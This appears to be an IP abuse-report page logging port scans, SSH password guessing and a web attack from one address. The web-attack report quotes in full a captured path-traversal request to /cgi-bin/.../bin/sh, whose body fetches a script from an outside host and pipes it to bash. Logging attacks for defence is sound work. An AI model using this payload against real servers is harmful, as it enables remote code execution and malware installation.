This IP address carried out 6 port scanning attempts on 28-08-2023. For more information or to repor ...
show moreThis IP address carried out 6 port scanning attempts on 28-08-2023. For more information or to report interesting/incorrect findings, give me a shoutout @parthmaniar on Twitter.
show less
ThreatBook Intelligence: Dynamic IP,Exploit more details on https://threatbook.io/ip/111.42.95.131
2 ...
show moreThreatBook Intelligence: Dynamic IP,Exploit more details on https://threatbook.io/ip/111.42.95.131
2023-08-28 01:55:55 /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh,{"body":"wget http://download.asyncfox.xyz/download/dupa2.sh -O- | bash; curl -O http://download.asyncfox.xyz/download/dupa2.sh | bash; echo Okk","content_type":"text/plain","header":{"Accept":["*/*"],"Connection":["keep-alive"],"Content-Length":["135"],"Content-Type":["text/plain"],"Upgrade-Insecure-Requests":["1"],"User-Agent":["Custom-AsyncHttpClient"]},"host":"162.14.104.97:80","method":"POST","proto":"HTTP/1.1","remote_addr":"111.42.95.131:53986","status_code":200,"url":"/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh","user_agent":"Custom-AsyncHttpClient"}
show less
fail2ban apache-modsecurity [msg "Request content type is not allowed by policy"] [uri "/cgi-bin/.%2 ...
show morefail2ban apache-modsecurity [msg "Request content type is not allowed by policy"] [uri "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh"]
show less
Web App Attack
Anonymous
Aug 29 00:18:41 f2b auth.info sshd[1184119]: Invalid user 123456 from 111.42.95.131 port 33196
Aug 2 ...
show moreAug 29 00:18:41 f2b auth.info sshd[1184119]: Invalid user 123456 from 111.42.95.131 port 33196
Aug 29 00:18:41 f2b auth.info sshd[1184119]: Failed password for invalid user 123456 from 111.42.95.131 port 33196 ssh2
Aug 29 00:19:13 f2b auth.info sshd[1184121]: Failed password for root from 111.42.95.131 port 34582 ssh2
...
show less